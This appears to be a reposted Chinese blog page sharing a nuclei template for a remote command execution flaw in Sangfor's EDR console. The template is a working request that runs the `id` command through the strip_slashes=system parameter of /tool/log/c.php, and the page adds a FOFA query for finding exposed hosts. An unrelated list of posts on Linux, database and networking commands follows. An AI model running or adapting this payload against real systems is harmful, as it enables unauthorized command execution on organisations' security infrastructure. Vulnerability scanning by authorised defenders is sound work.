首页 > 其他分享 >深信服edr命令执行

深信服edr命令执行

时间:2023-10-09 11:36:35浏览次数:25  
标签:Log 信服 edr 命令 RCE id condition

nuclei验证脚本:

id: SXF_Log_RCE

info:

  name: SXF_Log_RCE

  author: H0m3ly

  severity: critical

  tags: 深信服edr命令执行

  description: FOFA语法: title="终端检测响应平台"


requests:

  - raw:

      - |+

        GET //tool/log/c.php?strip_slashes=system&host=id HTTP/1.1

        Host: {{Hostname}}

        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0




    # 设置不自动跳转

    host-redirects: false    

    matchers-condition: and

    matchers:

      - type: word

        part: body

        words:

          - 'Log Helper'

          - 'gid'

          - 'uid'

          - 'groups'

        condition: and


      - type: status

        status:

          - 200

        condition: and

 

标签:Log,信服,edr,命令,RCE,id,condition
From: https://www.cnblogs.com/1zzZ/p/17751262.html

相关文章

  • PostgreSQL操作-psql基本命令
    一、建立数据库连接----------------接入PostgreSQL数据库:psql-hIP地址-p端口-U数据库名之后会要求输入数据库密码 二、访问数据库1、列举数据库:\l2、选择数据库:\c数据库名3、查看该某个库中的所有表:\dt4、切换数据库:\cinterface5、查看某个库中的某个表结构:\d表......
  • redis-trib.rb命令详解
    redis-trib.rb是官方提供的RedisCluster的管理工具,无需额外下载,默认位于源码包的src目录下,但因该工具是用ruby开发的,所以需要准备相关的依赖环境。 准备redis-trib.rb的运行环境wgethttps://cache.ruby-lang.org/pub/ruby/2.5/ruby-2.5.1.tar.gzyum-yinstallzlib-devel......
  • sed命令复习
    sed显示文件的倒数第二行:(以下三种方法都可以)sed-e'$!{h;d;}'-exfile.txtsed-n'x;$p'file.txtsed'x;$!d'file.txt 加上for循环,批量显示每个文件的倒数第二行 foriin`ls*.log`;dosed'x;$p'-n $i;done   sed显示文件的最后一行:sed-n'$p......
  • docker常用命令
    docker网络相关设置常见的网络模式有:bridge:默认网络模式,容器和主机在同一个子网中,可以通过IP地址相互访问。host:容器和主机共享一个网络命名空间,容器直接使用主机的网络接口。none:容器没有网络接口,无法进行网络通信。container:容器和另一个容器共享同一个网络命名......
  • git常用命令
    要配置Git的用户名和密码,您可以使用以下命令:设置用户名:gitconfig--globaluser.name"YourName"设置用户邮箱:gitconfig--globaluser.email"[email protected]"设置用户密码缓存:gitconfig--globalcredential.helpercache这将在10分钟内缓存您的密码......
  • OSPF常用配置和常用的查看命令
    转载请注明出处:1.启动OSPF进程,进入OSPF视图。[Huawei]ospf[process-id|RouterIDRouterID]路由器支持OSPF多进程,进程号是本地概念,两台使用不同OSPF进程号设备之间也能够建立邻接关系。2.创建并进入OSPF区域视图[Huawei-ospf-1]areaarea-id在OpenShor......
  • 网络管理命令1
    一:概述LInux系统中有很多的网络管理命令,比如ip命令。利用网络管理命令我们可以有效的管理网络,当网络出现故障时可以通过这些网络有效的诊断出问题原因。二:ip命令实现网络管理首先来说一下net-tools和iproute这两个工具。早先在Linux系统管理员进行网络配置时主要使用net-tools管理......
  • maven命令
    mvnpackage生成target目录,编译、测试代码,生成测试报错,生成jar/war文件mvncompile表示进行编译,会将代码编译到target文件夹中mvninstall 运行安装,会将打好的包安装到本地仓库中,以便其他的项目可以调用Maveninstall安装指令,其做了两件事情:1.将项目打包(jar/war),将打包结......
  • win行命令
    #win行命令```markdown#2、查找所有运行的端口输入命令:netstat-ano该命令列出所有端口的使用情况。在列表中我们观察被占用的端口,比如是1224,首先找到它。#3、查看被占用端口对应的PID输入命令:netstat-aon|findstr"8081"回车执行该命令,最后一位数字......
  • 虚拟化技术之kvm管理工具virsh常用基础命令(二)
    上一篇博客我们主要聊了下virsh管理kvm虚拟机的命令相关用法和说明,回顾请参考https://www.cnblogs.com/qiuhom-1874/p/13508231.html;今天我们来继续说virsh管理kvm虚拟机的话题;1、virsh监控kvm虚拟机相关命令virsh domblklist:列出指定虚拟机上的磁盘信息......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99